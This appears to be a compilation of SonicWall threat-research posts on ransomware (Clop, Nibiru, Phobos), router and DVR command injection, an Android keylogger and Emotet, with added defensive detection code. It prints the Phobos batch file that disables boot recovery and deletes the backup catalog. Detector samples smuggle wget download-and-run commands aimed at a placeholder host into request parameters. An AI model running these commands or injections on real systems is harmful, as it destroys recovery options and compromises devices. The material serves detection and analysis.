
A new variant of Clop Ransomware surfaces

The SonicWall Capture Labs threat research team observed reports of a new variant family of Clop ransomware (Detected as Clop.RSM) actively spreading in the wild.

The Clop ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle

The ransomware adds the following files to the system:

  • Malware.exe
  • %CurrentFolder%\HotGIrls (ZeroKb)
  • %CurrentFolder%\Clearnetworkdns_11-22-33.bat

To defeat emulators and time-bound sandboxes, it calls Kernel32.dll APIs with invalid parameters inside a loop that repeats 666000 times, so the real malicious code is only reached after the sandbox has given up.

After the loop completes it starts enumerating running processes.

The malware checks for the presence of the following security-vendor processes:

  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If any of these processes is present, it delays execution by 10 seconds, calling the Sleep() API twice with a 5-second delay each time.

It creates a mutex named “^_-HappyLife^_-” and checks whether it already existed by calling WaitForSingleObject and comparing the result with 0. A non-zero result means another instance is already running, in which case it exits.

After that it follows the normal execution path (the path taken when none of the security-vendor processes listed above is present).

It drops a batch file in the folder from which the sample was executed and runs it using the ShellExecute API.

It then creates two threads: one uses MPR.DLL to enumerate network resources and encrypt files found on network drives, and the other enumerates running processes:

It walks directories and subdirectories using the FindFirstFile and FindNextFile APIs, computes a hash over each file or folder path, and compares it with hardcoded hash values. If the hash matches, that folder or file is skipped and not encrypted:

In the second thread it enumerates the processes and converts each process name to upper case:

Using the same hashing logic applied to file and folder names, it computes a hash of each process name, compares it with hardcoded hash values, and terminates any process whose hash matches.

It encrypts the bytes of each file with a randomly generated AES key. After encryption it appends the marker “Clop^_” to the end of the file, followed by the file's AES key encrypted with the master RSA key hardcoded in the malware.

The .Clop extension is appended to the encrypted files.

In each folder it drops ClopReadMe.txt containing the ransom note.
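The trailer layout just described (ciphertext, the “Clop^_” marker, then the RSA-wrapped AES key) is enough to write an incident-scoping helper. The following is an added example, not SonicWall's code or part of the original write-up; it assumes, since the write-up does not give the length of the wrapped key, that everything after the marker is the wrapped key blob.

```python
"""Triage helper for files suspected to carry this Clop variant's trailer.

Added example, not SonicWall's code. It relies only on the layout described
above: ciphertext, then the marker b"Clop^_", then the per-file AES key
encrypted with the attacker's master RSA key. The write-up does not give the
length of that wrapped key, so everything after the marker is treated as the
wrapped key blob (an assumption of this example).
"""
import os
from dataclasses import dataclass
from typing import List, Optional

CLOP_MARKER = b"Clop^_"
CLOP_EXTENSION = ".Clop"
RANSOM_NOTE = "ClopReadMe.txt"


@dataclass
class ClopArtifact:
    path: str
    has_clop_extension: bool
    ciphertext_len: int   # bytes preceding the marker
    wrapped_key: bytes    # bytes following the marker: AES key under the master RSA key


def parse_clop_trailer(path: str, data: bytes) -> Optional[ClopArtifact]:
    """Return a ClopArtifact when the buffer carries the Clop trailer, else None.

    rfind is used so that a file whose plaintext happened to contain the
    marker string is still split at the trailer the malware appended last.
    """
    idx = data.rfind(CLOP_MARKER)
    if idx < 0:
        return None
    return ClopArtifact(
        path=path,
        has_clop_extension=path.endswith(CLOP_EXTENSION),
        ciphertext_len=idx,
        wrapped_key=data[idx + len(CLOP_MARKER):],
    )


def scan_tree(root: str) -> List[ClopArtifact]:
    """Walk a directory tree and collect every file that carries the trailer."""
    hits: List[ClopArtifact] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == RANSOM_NOTE:
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            art = parse_clop_trailer(full, data)
            if art is not None:
                hits.append(art)
    return hits


def ransom_note_folders(root: str) -> List[str]:
    """Folders containing ClopReadMe.txt, which the malware drops per folder."""
    return [d for d, _s, files in os.walk(root) if RANSOM_NOTE in files]


# Constructed sample buffers (not real Clop output): 32 bytes standing in for
# ciphertext, the marker, then 16 bytes standing in for the wrapped AES key.
SAMPLE_ENCRYPTED = bytes(range(32)) + CLOP_MARKER + b"\xaa" * 16
SAMPLE_CLEAN = b"just an ordinary document"

if __name__ == "__main__":
    print(parse_clop_trailer("report.docx.Clop", SAMPLE_ENCRYPTED))
    print(parse_clop_trailer("report.docx", SAMPLE_CLEAN))
```

The wrapped key can only be opened with the operator's RSA private key, so the helper's value is in scoping an incident (which files and folders were touched) and in preserving the trailer bytes for a later recovery effort, not in decrypting anything.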


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Clop.RSM (Trojan)

Attackers actively targeting vulnerable AVTECH devices

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in AVTECH devices. AVTECH’s primary products are DVR and mobile surveillance systems. Its products target the IP camera market and are commonly used in intelligence surveillance systems.
Attackers are targeting the following two vulnerabilities in AVTECH’s products:

1. Unauthenticated command injection in DVR devices

The cgi_query action in Search.cgi performs HTTP requests with the wget system command, passing the received parameters through without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.

The following exploits were spotted in the wild:

2. Authenticated command injection in CloudSetup.cgi

Devices that support the Avtech cloud contain CloudSetup.cgi, which can be accessed after authentication. The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed. Since there is no verification or whitelist-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges.

The following exploits were spotted in the wild for this vulnerability:

Decoding the URLs and taking a closer look at them:

Both exploits connect to a malicious domain and download a shell script. The exploit then changes the file's permissions and executes the script, which in turn connects to the attacker-controlled server to download more malicious files.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 14697: AVTECH Devices Command Injection
  • IPS 13035: AVTECH Devices Remote Command Execution
  • GAV: Mirai.H
  • GAV: Mirai.H_2
  • GAV: MiraiA.N
  • GAV: MiraiA.N_2

Threat Graph

IoCs:
185.172.110.205
185.172.110.241
185.172.111.196
185.172.111.202
45.95.168.98
dcdeae98d9ab0fa3005ec36b1f55bb5b
99d3ce410735ba5e7008198aae3a6e39
4dcfa2daeb85d89da784e5e1928062de
148a1941582372ce22eacf86b5c7f852


Nibiru ransomware actively spreading in the wild

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of NIBIRU ransomware [NIBIRU.RSM] actively spreading in the wild.

The NIBIRU ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <NIBIRU >

Once the computer is compromised, the ransomware runs the following commands (actual source code):

When NIBIRU starts, it creates and assigns a unique ID number to the victim, then scans all local drives for data files to encrypt.

When encrypting files it uses the AES encryption algorithm and only encrypts files that match the following extensions:

The ransomware encrypts all the files and appends the [NIBIRU] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware displays the following image, which tells the victim that the computer has been encrypted and to contact its developer for unlock instructions.


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: NIBIRU.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

A potent keylogger on Github

SonicWall Threats Research team came across an interesting tweet mentioning a repository on GitHub. The repository, named Hakistan, boasts a collection of hacking-related tools. One of them is a keylogger named Hakistan keylogger, which does not appear to have been created for malicious purposes.


Application details


Interestingly, the application name is Google Service and it carries a matching icon. Clearly this keylogger is trying to masquerade as a legitimate application, thereby violating Google Play policies.


Some of the services and receivers in this app request dangerous permissions such as:

  • BIND_NOTIFICATION_LISTENER_SERVICE
  • BIND_DEVICE_ADMIN
  • BIND_ACCESSIBILITY_SERVICE
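The three permissions above are bind permissions: a service or receiver guarded by one of them is a component the OS itself binds to, which is how a notification listener, accessibility service or device-admin receiver gets its reach. The following added example (not code from the Hakistan repository or from SonicWall) pulls such components out of a manifest and applies the label-versus-package heuristic suggested by the “Google Service” masquerade; the manifest is constructed and its package name is a placeholder, and the com.google prefix rule is this example's assumption rather than an Android rule.

```python
"""Added example (not code from the Hakistan repository or from SonicWall):
flag Android manifest components that are protected by the high-privilege
bind permissions listed above, and spot a label that claims to be a Google
service on a package that is not Google's. The manifest is constructed for
this demonstration; the package name is a placeholder."""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_PERMISSION = "{%s}permission" % ANDROID_NS
A_NAME = "{%s}name" % ANDROID_NS
A_LABEL = "{%s}label" % ANDROID_NS

# The three bind permissions named in the write-up.
SENSITIVE_BIND_PERMISSIONS = {
    "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE",
    "android.permission.BIND_DEVICE_ADMIN",
    "android.permission.BIND_ACCESSIBILITY_SERVICE",
}

# Constructed manifest modelled on the write-up: a "Google Service" label on a
# package that is not Google's, plus three OS-bound components.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.placeholder">
  <application android:label="Google Service">
    <service android:name=".KeyService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
    <service android:name=".NotifService"
             android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"/>
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN"/>
    <receiver android:name=".BootReceiver"/>
  </application>
</manifest>
"""


def sensitive_components(manifest_xml: str) -> List[Tuple[str, str, str]]:
    """Return (component kind, class name, bind permission) for every service
    or receiver guarded by one of the sensitive bind permissions."""
    root = ET.fromstring(manifest_xml)
    found = []
    for elem in root.iter():
        if elem.tag not in ("service", "receiver"):
            continue
        perm = elem.get(A_PERMISSION)
        if perm in SENSITIVE_BIND_PERMISSIONS:
            found.append((elem.tag, elem.get(A_NAME, "?"), perm))
    return found


def label_package_mismatch(manifest_xml: str) -> Dict[str, str]:
    """Heuristic for the masquerade described above: a label that claims to be
    a Google service while the package does not live under com.google.
    The vendor-prefix rule is an assumption of this example."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    app = root.find("application")
    label = app.get(A_LABEL, "") if app is not None else ""
    claims_google = "google" in label.lower()
    is_google_pkg = package.startswith("com.google.")
    return {
        "package": package,
        "label": label,
        "suspicious": "yes" if claims_google and not is_google_pkg else "no",
    }


if __name__ == "__main__":
    for kind, name, perm in sensitive_components(SAMPLE_MANIFEST):
        print(f"{kind:8} {name:16} {perm}")
    print(label_package_mismatch(SAMPLE_MANIFEST))
```

On a real APK the manifest is binary XML and must first be decoded with a tool such as apktool; the checks themselves do not change.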

Keylogging

Once execution begins, the application, as expected, asks the victim to grant several permissions and accesses:

Once the required permissions are granted, the keylogger keeps running in the background and monitors the victim’s keystrokes. The keystrokes are stored in a local file as shown:


Additional Features

This keylogger logs more than just keystrokes. Some of the additional data it steals is shown below:

Captures SMS on the device


Monitors incoming SMS


Forwards SMS present on the device


Captures system information


Clients receive data about victims via email messages whose ‘from’ address is keylogger@hakistan.org:


In the current sample the ‘to’ address is base64 encoded and decodes to dashdashpass7@gmail.com.


These findings go in line with what is advertised about this keylogger:


Research-related tools on GitHub are a dime a dozen; when they are meant for research, most carry a disclaimer stating their purpose. In this case, the fact that the application is installed as Google Services with a believable icon makes it look suspicious.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOSHakis.KLG (Trojan)

Microsoft Security Bulletin Coverage for October 2020

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2020. A list of the issues reported, along with SonicWall coverage information, follows:

CVE-2020-16896 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
IPS 15203:Windows Remote Desktop Protocol Information Disclosure (CVE-2020-16896)

CVE-2020-16898 Windows TCP/IP Remote Code Execution Vulnerability
IPS 2416:Windows TCP/IP Remote Code Execution (CVE-2020-16898)

CVE-2020-16899 Windows TCP/IP Denial of Service Vulnerability
IPS 2427:Windows TCP/IP DoS (CVE-2020-16899)

CVE-2020-16907 Win32k Elevation of Privilege Vulnerability
ASPY 108:Malformed-File exe.MP.158

CVE-2020-16913 Win32k Elevation of Privilege Vulnerability
ASPY 5998:Malformed-File exe.MP.159

CVE-2020-16915 Media Foundation Memory Corruption Vulnerability
IPS 15202:Windows Media Foundation Memory Corruption Vulnerability (CVE-2020-16915)

CVE-2020-16922 Windows Spoofing Vulnerability
ASPY 5999:Malformed-File cat.MP.1

The following vulnerabilities have no known exploits in the wild:

  • CVE-2020-0764 Windows Storage Services Elevation of Privilege Vulnerability
  • CVE-2020-1047 Windows Hyper-V Elevation of Privilege Vulnerability
  • CVE-2020-1080 Windows Hyper-V Elevation of Privilege Vulnerability
  • CVE-2020-1167 Microsoft Graphics Components Remote Code Execution Vulnerability
  • CVE-2020-1243 Windows Hyper-V Denial of Service Vulnerability
  • CVE-2020-16863 Windows Remote Desktop Service Denial of Service Vulnerability
  • CVE-2020-16876 Windows Application Compatibility Client Library Elevation of Privilege Vulnerability
  • CVE-2020-16877 Windows Elevation of Privilege Vulnerability
  • CVE-2020-16885 Windows Storage VSP Driver Elevation of Privilege Vulnerability
  • CVE-2020-16886 PowerShellGet Module WDAC Security Feature Bypass Vulnerability
  • CVE-2020-16887 Windows Network Connections Service Elevation of Privilege Vulnerability
  • CVE-2020-16889 Windows KernelStream Information Disclosure Vulnerability
  • CVE-2020-16890 Windows Kernel Elevation of Privilege Vulnerability
  • CVE-2020-16891 Windows Hyper-V Remote Code Execution Vulnerability
  • CVE-2020-16892 Windows Image Elevation of Privilege Vulnerability
  • CVE-2020-16894 Windows NAT Remote Code Execution Vulnerability
  • CVE-2020-16895 Windows Error Reporting Manager Elevation of Privilege Vulnerability
  • CVE-2020-16897 NetBT Information Disclosure Vulnerability
  • CVE-2020-16900 Windows Event System Elevation of Privilege Vulnerability
  • CVE-2020-16901 Windows Kernel Information Disclosure Vulnerability
  • CVE-2020-16902 Windows Installer Elevation of Privilege Vulnerability
  • CVE-2020-16904 Azure Functions Elevation of Privilege Vulnerability
  • CVE-2020-16905 Windows Error Reporting Elevation of Privilege Vulnerability
  • CVE-2020-16908 Windows Setup Elevation of Privilege Vulnerability
  • CVE-2020-16909 Windows Error Reporting Elevation of Privilege Vulnerability
  • CVE-2020-16910 Windows Security Feature Bypass Vulnerability
  • CVE-2020-16911 GDI+ Remote Code Execution Vulnerability
  • CVE-2020-16912 Windows Backup Service Elevation of Privilege Vulnerability
  • CVE-2020-16914 Windows GDI+ Information Disclosure Vulnerability
  • CVE-2020-16916 Windows COM Server Elevation of Privilege Vulnerability
  • CVE-2020-16918 Base3D Remote Code Execution Vulnerability
  • CVE-2020-16919 Windows Enterprise App Management Service Information Disclosure Vulnerability
  • CVE-2020-16920 Windows Application Compatibility Client Library Elevation of Privilege Vulnerability
  • CVE-2020-16921 Windows Text Services Framework Information Disclosure Vulnerability
  • CVE-2020-16923 Microsoft Graphics Components Remote Code Execution Vulnerability
  • CVE-2020-16924 Jet Database Engine Remote Code Execution Vulnerability
  • CVE-2020-16927 Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability
  • CVE-2020-16928 Microsoft Office Click-to-Run Elevation of Privilege Vulnerability
  • CVE-2020-16929 Microsoft Excel Remote Code Execution Vulnerability
  • CVE-2020-16930 Microsoft Excel Remote Code Execution Vulnerability
  • CVE-2020-16931 Microsoft Excel Remote Code Execution Vulnerability
  • CVE-2020-16932 Microsoft Excel Remote Code Execution Vulnerability
  • CVE-2020-16933 Microsoft Word Security Feature Bypass Vulnerability
  • CVE-2020-16934 Microsoft Office Click-to-Run Elevation of Privilege Vulnerability
  • CVE-2020-16935 Windows COM Server Elevation of Privilege Vulnerability
  • CVE-2020-16936 Windows Backup Service Elevation of Privilege Vulnerability
  • CVE-2020-16937 .NET Framework Information Disclosure Vulnerability
  • CVE-2020-16938 Windows Kernel Information Disclosure Vulnerability
  • CVE-2020-16939 Group Policy Elevation of Privilege Vulnerability
  • CVE-2020-16940 Windows User Profile Service Elevation of Privilege Vulnerability
  • CVE-2020-16941 Microsoft SharePoint Information Disclosure Vulnerability
  • CVE-2020-16942 Microsoft SharePoint Information Disclosure Vulnerability
  • CVE-2020-16943 Dynamics 365 Commerce Elevation of Privilege Vulnerability
  • CVE-2020-16944 Microsoft SharePoint Reflective XSS Vulnerability
  • CVE-2020-16945 Microsoft Office SharePoint XSS Vulnerability
  • CVE-2020-16946 Microsoft Office SharePoint XSS Vulnerability
  • CVE-2020-16947 Microsoft Outlook Remote Code Execution Vulnerability
  • CVE-2020-16948 Microsoft SharePoint Information Disclosure Vulnerability
  • CVE-2020-16949 Microsoft Outlook Denial of Service Vulnerability
  • CVE-2020-16950 Microsoft SharePoint Information Disclosure Vulnerability
  • CVE-2020-16951 Microsoft SharePoint Remote Code Execution Vulnerability
  • CVE-2020-16952 Microsoft SharePoint Remote Code Execution Vulnerability
  • CVE-2020-16953 Microsoft SharePoint Information Disclosure Vulnerability
  • CVE-2020-16954 Microsoft Office Remote Code Execution Vulnerability
  • CVE-2020-16955 Microsoft Office Click-to-Run Elevation of Privilege Vulnerability
  • CVE-2020-16956 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability
  • CVE-2020-16957 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
  • CVE-2020-16967 Windows Camera Codec Pack Remote Code Execution Vulnerability
  • CVE-2020-16968 Windows Camera Codec Pack Remote Code Execution Vulnerability
  • CVE-2020-16969 Microsoft Exchange Information Disclosure Vulnerability
  • CVE-2020-16972 Windows Backup Service Elevation of Privilege Vulnerability
  • CVE-2020-16973 Windows Backup Service Elevation of Privilege Vulnerability
  • CVE-2020-16974 Windows Backup Service Elevation of Privilege Vulnerability
  • CVE-2020-16975 Windows Backup Service Elevation of Privilege Vulnerability
  • CVE-2020-16976 Windows Backup Service Elevation of Privilege Vulnerability
  • CVE-2020-16977 Visual Studio Code Python Extension Remote Code Execution Vulnerability
  • CVE-2020-16978 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability
  • CVE-2020-16980 Windows iSCSI Target Service Elevation of Privilege Vulnerability
  • CVE-2020-16995 Network Watcher Agent Virtual Machine Extension for Linux Elevation of Privilege Vulnerability
  • CVE-2020-17003 Base3D Remote Code Execution Vulnerability

Modular Emotet Variant

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Emotet. Emotet is an advanced, self-propagating modular malware. Historically, Emotet was an advanced banking trojan with botnet capabilities and indicators. Emotet has a variety of install sequences for many different content delivery mechanisms, but it is mostly spread through phishing spam emails carrying attachments. Its command and control, payloads, and delivery mechanisms change over time. Emotet first emerged in June 2014.

Sample, Static Information:

Checking for valid values within the PE File:

Command-line Static Information:

Capabilities, Privilege Escalation and Keylogging stand out here:

Dynamic Information:

WinMain:

Processes Created, Svchost, Calc, MSpaint, and itself twice:

Pipes are used to transfer data:

Network Artifacts:

Injection into mspaint.exe, IP Address: 212.83.168.196

IP Information:

Graph:

Other EXEs that align with this sample:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: Emotet.N (Trojan)

Appendix:

Sample SHA256 Hash: 5c5267ba9105ed1ebd26d50db8886030a601ffcda46fdbedf85b9a0bdc46e431

Attackers actively targeting Tenda WiFi router vulnerability

SonicWall Capture Labs Threat Research team observes attackers actively exploiting the arbitrary remote code execution vulnerability reported in the Tenda AC15 router. The Tenda AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking.

CVE-2020-10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName parameter. The vulnerability is due to improper validation of the deviceName parameter: its value is passed directly to a doSystemCmd function, resulting in arbitrary command execution.

Exploit:

In the exploit request captured below, the attacker passes a malicious shell command through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it.

When usb.sh is executed, it downloads more payloads from the attacker server 5.252.194.29 and executes them one by one.
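The Tenda deviceName vector and the two AVTECH vectors described earlier on this page (Search.cgi with action=cgi_query, and the exefile parameter of CloudSetup.cgi) are all command injection through a request parameter, so one log-side detector covers all three. The following is an added example, not SonicWall's IPS logic; it url-decodes requests (repeatedly, to catch double encoding) and then inspects only the parameters that reach a shell on each device. All request samples are constructed and the hostnames in them are placeholders.

```python
"""Added example, not SonicWall's IPS logic: a log-side detector for the three
command-injection vectors described on this page, AVTECH Search.cgi
(cgi_query action), AVTECH CloudSetup.cgi (exefile parameter) and Tenda
goform/setUsbUnload (deviceName parameter). Request samples are constructed;
the hostnames in them are placeholders."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Script name -> parameters that reach a shell on the affected device.
# None means "any parameter", used for Search.cgi when action=cgi_query.
WATCHED_PARAMS: Dict[str, Optional[set]] = {
    "Search.cgi": None,
    "CloudSetup.cgi": {"exefile"},
    "setUsbUnload": {"deviceName"},
}
VULN_NAMES = {
    "Search.cgi": "AVTECH Search.cgi cgi_query unauthenticated command injection",
    "CloudSetup.cgi": "AVTECH CloudSetup.cgi exefile authenticated command injection",
    "setUsbUnload": "Tenda AC15 setUsbUnload deviceName command injection (CVE-2020-10987)",
}
# Shell separators plus the download-and-run verbs seen in the exploits above.
SHELL_INDICATORS = re.compile(r"[;&|`]|\$\(|\b(?:wget|curl|chmod|sh|tftp)\b", re.I)


def fully_decode(value: str) -> str:
    """Repeat percent-decoding until stable so double-encoded payloads are seen."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value


def inspect_request(method: str, target: str, body: str = "") -> Optional[dict]:
    """Return a finding dict for a suspicious request, or None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in WATCHED_PARAMS:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    decoded = {k: [fully_decode(v) for v in vs] for k, vs in params.items()}

    # Search.cgi is only dangerous through the cgi_query action.
    if script == "Search.cgi" and "cgi_query" not in decoded.get("action", []):
        return None
    watched = WATCHED_PARAMS[script]
    if watched is None:
        watched = set(decoded) - {"action"}
    hits = sorted(k for k in watched
                  if any(SHELL_INDICATORS.search(v) for v in decoded.get(k, [])))
    if not hits:
        return None
    return {"vuln": VULN_NAMES[script], "method": method, "path": parts.path,
            "params": hits, "values": {k: decoded[k] for k in hits}}


def scan_requests(requests: List[tuple]) -> List[dict]:
    """Run inspect_request over (method, target, body) tuples."""
    return [f for f in (inspect_request(*r) for r in requests) if f]


# Constructed request samples (method, target, body); not real captures.
SAMPLE_REQUESTS = [
    ("GET", "/cgi-bin/Search.cgi?action=cgi_query&ip=203.0.113.5&port=80", ""),
    ("GET", "/cgi-bin/Search.cgi?action=cgi_query&ip=203.0.113.5%3Bwget%20http%3A%2F%2Fmalicious.example%2Fa.sh", ""),
    ("GET", "/cgi-bin/CloudSetup.cgi?exefile=wget%2520http%253A%252F%252Fmalicious.example%252Fb.sh", ""),
    ("POST", "/goform/setUsbUnload", "deviceName=sda1%3Bwget%20http%3A%2F%2Fmalicious.example%2Fusb.sh"),
    ("GET", "/index.html", ""),
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding["vuln"], finding["params"], finding["values"])
```

The first Search.cgi sample is a legitimate-looking query and produces no finding; the CloudSetup.cgi sample is double-encoded and is only caught because decoding is repeated until the value stops changing.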

Trend Chart:

IOC:

185.39.11.105
5.252.194.29

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13634 Suspicious Request URI 17
IPS: 5811 Web Application Suspicious File Upload 1 -c2
IPS: 3141 Web Application Suspicious File Upload 11
IPS: 15028 Web Application Suspicious File Upload 18


Operator of new Phobos variant gives blunt response during negotiation

The SonicWall Capture Labs threat research team has observed a new variant from the Phobos ransomware family. Like Sodinokibi, Phobos is sold on the criminal underground using the ransomware-as-a-service (RaaS) model. It is spread using various infection methods such as vulnerable Remote Desktop connections and spam email attachments. In the past we have seen Phobos primarily targeting businesses; recently, however, we have also seen several reports of individuals being hit with this malware. During our analysis of this malware we negotiated the ransom payment with the operator.


Infection cycle:


Upon infection, the following files are dropped onto the system:

  • %APPDATA%\roaming\microsoft\windows\start menu\programs\startup\db_exec.exe [Detected as: GAV: Phobos.RSM_12 (Trojan)]
  • {malware run location}\TempWmicBatchFile.bat
  • {desktop}\info.hta
  • {desktop}\info.txt


Files on the system are encrypted and given the following extension:

  • id[94458690-2589].[helpisos@aol.com].isos


TempWmicBatchFile.bat contains the following script which, when executed, disables system recovery features:

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
exit
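The three commands in that batch file are the usual way ransomware inhibits system recovery, and each maps cleanly to a process-creation rule. The following added example (not SonicWall detection content) flags them in constructed process-creation events, groups them by parent process so the batch-file pattern stands out from a lone administrative bcdedit run, and parses the Phobos-style file name shown above into its victim id and contact address. The events and file names are constructed, and the assumption that the suffix is appended to the original file name is this example's own.

```python
"""Added example, not SonicWall detection content: flag the recovery-inhibiting
commands from TempWmicBatchFile.bat above in process-creation telemetry, and
parse the Phobos-style encrypted file name so the victim id and contact address
can be pulled into an incident record. Events and file names are constructed."""
import re
from typing import Dict, List, Optional

# One rule per line of the batch file (the trailing "exit" is not interesting).
RECOVERY_INHIBIT_RULES = [
    ("bcdedit ignoreallfailures",
     re.compile(r"\bbcdedit\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I)),
    ("bcdedit recoveryenabled no",
     re.compile(r"\bbcdedit\b.*\brecoveryenabled\s+no\b", re.I)),
    ("wbadmin delete catalog",
     re.compile(r"\bwbadmin\b\s+delete\s+catalog\b", re.I)),
]

# <original name>.id[<victim id>].[<contact>].<ext>; the assumption that the
# suffix follows the original file name is this example's.
PHOBOS_NAME = re.compile(
    r"^(?P<original>.+)\.id\[(?P<victim_id>[0-9A-Fa-f]+-\d+)\]"
    r"\.\[(?P<contact>[^\]]+)\]\.(?P<ext>[A-Za-z0-9]+)$"
)


def classify_command(cmdline: str) -> List[str]:
    """Names of the recovery-inhibition rules a command line matches."""
    return [name for name, rx in RECOVERY_INHIBIT_RULES if rx.search(cmdline)]


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the matching events, each enriched with the rule names it hit."""
    out = []
    for ev in events:
        rules = classify_command(ev.get("cmdline", ""))
        if rules:
            out.append({**ev, "rules": ", ".join(rules)})
    return out


def parents_with_full_sequence(events: List[Dict[str, str]]) -> List[str]:
    """Parent pids under which all three batch-file commands were observed.
    A single bcdedit run by an administrator will not reach this bar."""
    seen: Dict[str, set] = {}
    for ev in scan_events(events):
        seen.setdefault(ev.get("parent_pid", "?"), set()).update(ev["rules"].split(", "))
    needed = {name for name, _ in RECOVERY_INHIBIT_RULES}
    return sorted(p for p, names in seen.items() if names >= needed)


def parse_phobos_name(filename: str) -> Optional[Dict[str, str]]:
    """Split an encrypted file name into original name, victim id, contact, extension."""
    m = PHOBOS_NAME.match(filename)
    return m.groupdict() if m else None


# Constructed process-creation events: the batch file's three children under
# one cmd.exe (pid 4400) plus an unrelated administrative bcdedit run.
SAMPLE_EVENTS = [
    {"pid": "4412", "parent_pid": "4400", "image": "C:\\Windows\\System32\\bcdedit.exe",
     "cmdline": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": "4416", "parent_pid": "4400", "image": "C:\\Windows\\System32\\bcdedit.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled no"},
    {"pid": "4420", "parent_pid": "4400", "image": "C:\\Windows\\System32\\wbadmin.exe",
     "cmdline": "wbadmin delete catalog -quiet"},
    {"pid": "5100", "parent_pid": "900", "image": "C:\\Windows\\System32\\bcdedit.exe",
     "cmdline": "bcdedit /enum"},
]
SAMPLE_FILENAME = "budget.xlsx.id[94458690-2589].[helpisos@aol.com].isos"

if __name__ == "__main__":
    for ev in scan_events(SAMPLE_EVENTS):
        print(ev["parent_pid"], ev["pid"], ev["rules"])
    print("full sequence under parents:", parents_with_full_sequence(SAMPLE_EVENTS))
    print(parse_phobos_name(SAMPLE_FILENAME))
```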


info.hta contains the ransom message and is displayed multiple times on the desktop:


info.txt also contains the ransom message:


Negotiation:


We attempted to reach out to helpisos@aol.com as instructed in the ransom note but were notified by the email server that the address “couldn’t be found, or is unable to receive mail”. We proceeded to contact @iso_recovery on Telegram and had the following conversation with the operator:


Nowadays, ransom fees for individuals are negotiable. We tried our luck to see how much of a discount was available:


We attempted to push further and enlighten the operator about our “dire financial situation” but received the following blunt response:


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Phobos.RSM_12 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

CVE-2020-17496 – vBulletin RCE vulnerability actively being exploited in the wild

SonicWall Capture Labs Threat Research team observes attackers actively exploiting the recent remote code execution vulnerability reported in vBulletin. vBulletin is popular forum software used by about 20,000 websites. It is written in PHP and uses a MySQL database.

CVE-2020-17496 | Vulnerability:

A remote code execution vulnerability has been reported in vBulletin. It is due to improper validation of the subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request, and it bypasses the fix for CVE-2019-16759, a critical pre-authentication vulnerability in vBulletin disclosed in September 2019. In that earlier issue, when an attacker sent a crafted ajax request naming the template widget_php with malicious code placed in the parameter widgetConfig[‘code’], the render engine executed the code in the request. It was fixed by checking the template name: if the name is widget_php, the engine will not render the requested template. That made widget_php the only template usable for PHP code execution. In the latest bypass, the widget_tabbedcontainer_tab_panel template is found to be capable of loading a user-controlled child template, effectively bypassing the patch for CVE-2019-16759.

Exploit:

